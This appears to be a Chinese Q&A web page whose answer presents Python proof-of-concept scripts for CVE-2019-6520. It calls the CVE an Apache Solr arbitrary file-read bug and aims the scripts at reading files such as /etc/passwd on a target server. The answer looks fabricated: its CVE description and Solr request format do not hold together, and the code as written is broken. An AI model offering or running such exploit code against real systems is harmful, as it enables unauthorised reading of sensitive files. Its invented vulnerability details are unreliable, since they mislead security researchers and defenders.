cve-2019-6520编写poc
时间: 2023-06-30 20:06:08 浏览: 185
CVE-2019-11043:Neex的(PoC)CVE-2019-11043 Python版本
CVE-2019-6520是一个Apache Solr中的任意文件读取漏洞。攻击者可以利用该漏洞读取服务器上的任意文件。
下面是一个简单的Python脚本,可以利用该漏洞读取指定文件:
```python
import requests
url = "http://<target>/solr/+/get"
params = {
"getParams": {
"content": "file:/<path to file>"
}
}
response = requests.get(url, params=params)
print(response.text)
```
将`<target>`替换为目标服务器的IP地址或域名,将`<path to file>`替换为要读取的文件的路径。
例如,要读取`/etc/passwd`文件,可以使用以下命令:
```python
import requests
url = "http://example.com/solr/+/get"
params = {
"getParams": {
"content": "file:/etc/passwd"
}
}
response = requests.get(url, params=params)
print(response.text)
```
请注意,此脚本仅用于学习和研究目的,不应用于未经授权的攻击。
阅读全文